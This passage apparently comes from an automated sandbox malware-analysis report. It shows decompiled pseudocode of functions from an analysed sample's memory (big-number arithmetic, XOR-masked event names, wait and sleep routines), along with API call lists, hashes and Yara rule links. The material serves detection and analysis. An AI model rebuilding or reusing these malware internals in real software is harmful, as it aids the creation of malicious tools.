				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00A347C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00A3227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A33C06(_t101,  &_v428, _a8, _t96 - _t81);
					E00A33C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00A3227C(_t101, 0xa3d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00A3227C(_a16, _a4);
						E00A33450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00A3AED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00A3AECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00A32420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00A33F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00A32775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xa3d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                                  0x00a37b33
                                                                                                                                  0x00a37b3f
                                                                                                                                  0x00a37b45
                                                                                                                                  0x00a37b4a
                                                                                                                                  0x00a37b4e
                                                                                                                                  0x00a37cc0
                                                                                                                                  0x00a37cc4
                                                                                                                                  0x00a37cc4
                                                                                                                                  0x00a37b54
                                                                                                                                  0x00a37b58
                                                                                                                                  0x00a37b5c
                                                                                                                                  0x00a37b5f
                                                                                                                                  0x00a37b6a
                                                                                                                                  0x00a37b70
                                                                                                                                  0x00a37b75
                                                                                                                                  0x00a37b78
                                                                                                                                  0x00a37b92
                                                                                                                                  0x00a37ba1
                                                                                                                                  0x00a37bad
                                                                                                                                  0x00a37bb7
                                                                                                                                  0x00a37bbc
                                                                                                                                  0x00a37bbe
                                                                                                                                  0x00a37bc1
                                                                                                                                  0x00a37c78
                                                                                                                                  0x00a37c7e
                                                                                                                                  0x00a37c8f
                                                                                                                                  0x00a37ca2
                                                                                                                                  0x00a37cb8
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37cbd
                                                                                                                                  0x00a37bca
                                                                                                                                  0x00a37bd1
                                                                                                                                  0x00a37bd5
                                                                                                                                  0x00a37bdb
                                                                                                                                  0x00a37bdd
                                                                                                                                  0x00a37bdf
                                                                                                                                  0x00a37be1
                                                                                                                                  0x00a37be3
                                                                                                                                  0x00a37bed
                                                                                                                                  0x00a37bf2
                                                                                                                                  0x00a37bf4
                                                                                                                                  0x00a37bf6
                                                                                                                                  0x00a37bf7
                                                                                                                                  0x00a37bf8
                                                                                                                                  0x00a37bf9
                                                                                                                                  0x00a37c00
                                                                                                                                  0x00a37c07
                                                                                                                                  0x00a37c0a
                                                                                                                                  0x00a37c0a
                                                                                                                                  0x00a37bd7
                                                                                                                                  0x00a37bd7
                                                                                                                                  0x00a37bd7
                                                                                                                                  0x00a37c12
                                                                                                                                  0x00a37c1a
                                                                                                                                  0x00a37c26
                                                                                                                                  0x00a37c2b
                                                                                                                                  0x00a37c2b
                                                                                                                                  0x00a37c30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37c32
                                                                                                                                  0x00a37c35
                                                                                                                                  0x00a37c42
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37c44
                                                                                                                                  0x00a37c44
                                                                                                                                  0x00a37c51
                                                                                                                                  0x00a37c2b
                                                                                                                                  0x00a37c30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37c30
                                                                                                                                  0x00a37c5b
                                                                                                                                  0x00a37c5e
                                                                                                                                  0x00a37c61
                                                                                                                                  0x00a37c68
                                                                                                                                  0x00a37c68
                                                                                                                                  0x00a37c75
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37c75
                                                                                                                                  0x00a37b61
                                                                                                                                  0x00a37b65
                                                                                                                                  0x00a37b66
                                                                                                                                  0x00a37b68
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37b68
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A37BE3
                                                                                                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A37BF9
                                                                                                                                  • memset.NTDLL ref: 00A37CA2
                                                                                                                                  • memset.NTDLL ref: 00A37CB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_allmul_aulldiv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3041852380-0
                                                                                                                                  • Opcode ID: 2b741298b51d49c5806776396873d227b54408e925b3b5a6b47cd340b9801128
                                                                                                                                  • Instruction ID: 70d73ccd3ed2c07ac7df926d14d85e6c62c9037cd060673537704b575c36c4ae
                                                                                                                                  • Opcode Fuzzy Hash: 2b741298b51d49c5806776396873d227b54408e925b3b5a6b47cd340b9801128
                                                                                                                                  • Instruction Fuzzy Hash: 1541C371A04219AFDF20EF68CD81BEEB775EF45310F104569F90AA7281DB709E44CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A37CC7, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E00A37CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xa3d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xa3d2e0; // 0x296a5a8
				_t3 = _t8 + 0xa3e876; // 0x61636f4c
				_t25 = 0;
				_t30 = E00A33CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xa3d2e4, 1, 0, _t30);
					E00A34AAB(_t30);
				}
				_t12 =  *0xa3d294; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00A34A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00A31000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xa3d108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00A35AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                                                  0x00a37cc8
                                                                                                                                  0x00a37ccf
                                                                                                                                  0x00a37cd9
                                                                                                                                  0x00a37cdd
                                                                                                                                  0x00a37ce3
                                                                                                                                  0x00a37cf2
                                                                                                                                  0x00a37cf9
                                                                                                                                  0x00a37cfd
                                                                                                                                  0x00a37d0f
                                                                                                                                  0x00a37d11
                                                                                                                                  0x00a37d11
                                                                                                                                  0x00a37d16
                                                                                                                                  0x00a37d1d
                                                                                                                                  0x00a37d74
                                                                                                                                  0x00a37d74
                                                                                                                                  0x00a37d7a
                                                                                                                                  0x00a37d7c
                                                                                                                                  0x00a37d7c
                                                                                                                                  0x00a37d86
                                                                                                                                  0x00a37d8a
                                                                                                                                  0x00a37d9c
                                                                                                                                  0x00a37d9c
                                                                                                                                  0x00a37da0
                                                                                                                                  0x00a37da6
                                                                                                                                  0x00a37da6
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37d36
                                                                                                                                  0x00a37d3b
                                                                                                                                  0x00a37d43
                                                                                                                                  0x00a37d47
                                                                                                                                  0x00a37d4b
                                                                                                                                  0x00a37d4b
                                                                                                                                  0x00a37d58
                                                                                                                                  0x00a37d5c
                                                                                                                                  0x00a37d60
                                                                                                                                  0x00a37db5
                                                                                                                                  0x00a37dbb
                                                                                                                                  0x00a37dbb
                                                                                                                                  0x00a37d6e
                                                                                                                                  0x00a37d72
                                                                                                                                  0x00a37da9
                                                                                                                                  0x00a37dab
                                                                                                                                  0x00a37dae
                                                                                                                                  0x00a37dae
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37dab
                                                                                                                                  0x00a37d72
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37d5c

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A33CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,033A9B38,00000000,?,?,69B25F44,00000005,00A3D00C,?,?,00A3539B), ref: 00A33CF8
                                                                                                                                    • Part of subcall function 00A33CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 00A33D1C
                                                                                                                                    • Part of subcall function 00A33CC2: lstrcat.KERNEL32(00000000,00000000), ref: 00A33D24
                                                                                                                                  • CreateEventA.KERNEL32(00A3D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A321B6,?,00000001,?), ref: 00A37D08
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00A321B6,00000000,00000000,?,00000000,?,00A321B6,?,00000001,?,?,?,?,00A3555B), ref: 00A37D68
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00A321B6,?,00000001,?), ref: 00A37D96
                                                                                                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A321B6,?,00000001,?,?,?,?,00A3555B), ref: 00A37DAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 73268831-0
                                                                                                                                  • Opcode ID: 665a85b67f9b6bdc9f94d9d3857774c8720941c15420ce3c9c96be4abeb8bd2a
                                                                                                                                  • Instruction ID: 09dd3b10facb6e6682d25ae265c65f13880e4173f0930141df9f726e6b8f7fe9
                                                                                                                                  • Opcode Fuzzy Hash: 665a85b67f9b6bdc9f94d9d3857774c8720941c15420ce3c9c96be4abeb8bd2a
                                                                                                                                  • Instruction Fuzzy Hash: B92107B2A047529BD7329FA89C84A7F7399FF89790F050725F986EB150DB70CC028B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F02A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1384045349-0
                                                                                                                                  • Opcode ID: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction ID: 0903cdbf6cd7a2f8dbe30e1ef9198d78cd119f97495db3acb285da0d538c4767
                                                                                                                                  • Opcode Fuzzy Hash: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction Fuzzy Hash: 5D4106B1C00258DFDB14CFE8C940BDDBBB8BF49308F108AA9E419AB281EB755A44CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A32107, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 40%
                                                                                                                                  			E00A32107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00A33946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00A365EA(_t23);
						}
					}
					return _t38;
				}
				if(E00A337AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xa3d2e4, 1, 0,  *0xa3d384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00A324BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00A3282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00A351BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00A37CC7( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                                  0x00a32107
                                                                                                                                  0x00a32114
                                                                                                                                  0x00a3211a
                                                                                                                                  0x00a3211b
                                                                                                                                  0x00a3211c
                                                                                                                                  0x00a3211d
                                                                                                                                  0x00a3211e
                                                                                                                                  0x00a32122
                                                                                                                                  0x00a3212e
                                                                                                                                  0x00a32132
                                                                                                                                  0x00a321ba
                                                                                                                                  0x00a321ba
                                                                                                                                  0x00a321bd
                                                                                                                                  0x00a321bf
                                                                                                                                  0x00a321c7
                                                                                                                                  0x00a321c7
                                                                                                                                  0x00a321cd
                                                                                                                                  0x00a321d0
                                                                                                                                  0x00a321d0
                                                                                                                                  0x00a321cd
                                                                                                                                  0x00a321db
                                                                                                                                  0x00a321db
                                                                                                                                  0x00a32145
                                                                                                                                  0x00a32147
                                                                                                                                  0x00a32147
                                                                                                                                  0x00a3215e
                                                                                                                                  0x00a32162
                                                                                                                                  0x00a32165
                                                                                                                                  0x00a32170
                                                                                                                                  0x00a32177
                                                                                                                                  0x00a32177
                                                                                                                                  0x00a32180
                                                                                                                                  0x00a32184
                                                                                                                                  0x00a32192
                                                                                                                                  0x00a32186
                                                                                                                                  0x00a32186
                                                                                                                                  0x00a32187
                                                                                                                                  0x00a32188
                                                                                                                                  0x00a32189
                                                                                                                                  0x00a3218a
                                                                                                                                  0x00a3218b
                                                                                                                                  0x00a3218b
                                                                                                                                  0x00a32197
                                                                                                                                  0x00a3219a
                                                                                                                                  0x00a3219e
                                                                                                                                  0x00a321a0
                                                                                                                                  0x00a321a0
                                                                                                                                  0x00a321a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00a321a9
                                                                                                                                  0x00a321a9
                                                                                                                                  0x00a321b6
                                                                                                                                  0x00000000
                                                                                                                                  0x00a321b6

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00A3D2E4,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,00A3555B,?,00000001,?), ref: 00A32158
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,?,?,00A3555B,?,00000001,?,00000002,?,?,00A353C9,?), ref: 00A32165
                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,00A3555B,?,00000001,?,00000002,?,?,00A353C9,?), ref: 00A32170
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00A3555B,?,00000001,?,00000002,?,?,00A353C9,?), ref: 00A32177
                                                                                                                                    • Part of subcall function 00A324BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A32197,?,00A32197,?,?,?,?,?,00A32197,?), ref: 00A32598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559942907-0
                                                                                                                                  • Opcode ID: 78d84fdc4baa19905cb25b844e8bfbabc9fab9da037757eb12d1f6c8b7068244
                                                                                                                                  • Instruction ID: ca8f39b030a1fd304dfbc535a71294db1314c234f9e5e8e9166800a42a0a5fe2
                                                                                                                                  • Opcode Fuzzy Hash: 78d84fdc4baa19905cb25b844e8bfbabc9fab9da037757eb12d1f6c8b7068244
                                                                                                                                  • Instruction Fuzzy Hash: A2214F73900219ABCF20AFE49E85AAEB7B9EB48360F058525FB15A7100D7749D468BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9308CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction ID: e7c625cf5c8ee33ed51a7d1beea6d955a464cdec547837539f31e2f1f58af872
                                                                                                                                  • Opcode Fuzzy Hash: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction Fuzzy Hash: C221D872E05631EFEB115AE98C44B5A776D9F47BA0F310521E955AB384F630ED008DD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A322D2, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E00A322D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00A375F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                                  0x00a322de
                                                                                                                                  0x00a322e2
                                                                                                                                  0x00a322e3
                                                                                                                                  0x00a322e4
                                                                                                                                  0x00a322e6
                                                                                                                                  0x00a322e8
                                                                                                                                  0x00a322eb
                                                                                                                                  0x00a322f0
                                                                                                                                  0x00a32387
                                                                                                                                  0x00a3238e
                                                                                                                                  0x00a3238e
                                                                                                                                  0x00a322f9
                                                                                                                                  0x00a32300
                                                                                                                                  0x00a32310
                                                                                                                                  0x00a32310
                                                                                                                                  0x00a32316
                                                                                                                                  0x00a32318
                                                                                                                                  0x00a3231d
                                                                                                                                  0x00a32326
                                                                                                                                  0x00a3232c
                                                                                                                                  0x00a32331
                                                                                                                                  0x00a3233c
                                                                                                                                  0x00a32340
                                                                                                                                  0x00a32342
                                                                                                                                  0x00a32343
                                                                                                                                  0x00a3234c
                                                                                                                                  0x00a32350
                                                                                                                                  0x00a32361
                                                                                                                                  0x00a32352
                                                                                                                                  0x00a32357
                                                                                                                                  0x00a3235c
                                                                                                                                  0x00a3236b
                                                                                                                                  0x00a3236b
                                                                                                                                  0x00a32340
                                                                                                                                  0x00a32371
                                                                                                                                  0x00a32377
                                                                                                                                  0x00a32377
                                                                                                                                  0x00a32380
                                                                                                                                  0x00a32385
                                                                                                                                  0x00a32385
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1198164300-0
                                                                                                                                  • Opcode ID: d53a7901f54c1b6d50589fb35c001e06f3f0e7164f72585eae965ce46c6b602e
                                                                                                                                  • Instruction ID: 60510d24193566badc1d40067b308950b83f164af80fc7a67c8168655413647d
                                                                                                                                  • Opcode Fuzzy Hash: d53a7901f54c1b6d50589fb35c001e06f3f0e7164f72585eae965ce46c6b602e
                                                                                                                                  • Instruction Fuzzy Hash: 01214F7990020AEFCB11DFA8D984A9EBBB9FF49310F108169F941EB210EB34DA45CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                  • _free.LIBCMT ref: 6E92F2FB
                                                                                                                                  • _free.LIBCMT ref: 6E92F331
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 17665bf3b6df14f5611f976393e3f7e52ce38b4694d6c9b2aa4ca7b4c251ab38
                                                                                                                                  • Instruction ID: 0968982f0bf7dd37af59804bce30cbcf7c72255aa00c76726e50d22b7ea15124
                                                                                                                                  • Opcode Fuzzy Hash: 17665bf3b6df14f5611f976393e3f7e52ce38b4694d6c9b2aa4ca7b4c251ab38
                                                                                                                                  • Instruction Fuzzy Hash: 44110A32229A226EEF411AF59C84D9F329D9FD36BDB350D34F534A61D8EF60C8098D50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F3F5
                                                                                                                                  • _free.LIBCMT ref: 6E92F452
                                                                                                                                  • _free.LIBCMT ref: 6E92F488
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F493
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: fc1311c86270baaea6892e4368129eacee1a1c6189304ff1ece7421417cfcd4b
                                                                                                                                  • Instruction ID: e73197dc68c5435c7b8b7e2190227aaa0a0fd879a24129ba6b53b217c5048673
                                                                                                                                  • Opcode Fuzzy Hash: fc1311c86270baaea6892e4368129eacee1a1c6189304ff1ece7421417cfcd4b
                                                                                                                                  • Instruction Fuzzy Hash: B411EC31628B116EEF611AF95C89D9B335DAFD267D7340934F534A63D8EFA0C8088920
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EF8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF95F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF96B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF980
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF998
                                                                                                                                  Memory Dump Source
